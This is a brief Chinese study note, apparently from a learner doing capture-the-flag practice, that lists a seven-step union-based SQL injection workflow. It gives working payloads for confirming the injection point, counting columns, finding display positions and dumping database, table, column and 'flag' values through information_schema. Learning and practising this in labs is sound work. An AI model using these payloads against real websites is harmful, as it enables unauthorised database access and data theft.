又回来了,哎,感觉这块是短板,我需要花三个月时间把这块补一补。
显错注入,从找点,到最后显名的完整流程。
这是个流程框架,内部可能还会有一些细微修改。
1:判断注入点
and 1=1 正常
and 1=2 出错
2:判断字段总数
and 1=1 order by 1
and 1=1 order by 2
and 1=1 order by 3
直到出错,得到总数
3:判断显示位置
and 1=1 union select 1
and 1=1 union select 1,2
and 1=1 union select 1,2,3
直到正确,或者有字符显示出来
4:查询当前库名
and 1=1 union select 1,2,database()
等它显示出来
5:查表名
and 1=2 union select 1,database(),table_name from information_schema.tables where TABLE_SCHEMA=database() limit 0,1
等它显示出来
6:查列名
and 1=2 union select 1,2,column_name from information_schema.columns where TABLE_NAME=表名 limit 0,1
and 1=2 union select 1,2,column_name from information_schema.columns where TABLE_NAME=表名 limit 1,1
and 1=2 union select 1,2,column_name from information_schema.columns where TABLE_NAME=表名 limit 2,1
直到出错
7:字段内容
and 1=2 union select 1,Id,flag from 表名 limit 0,1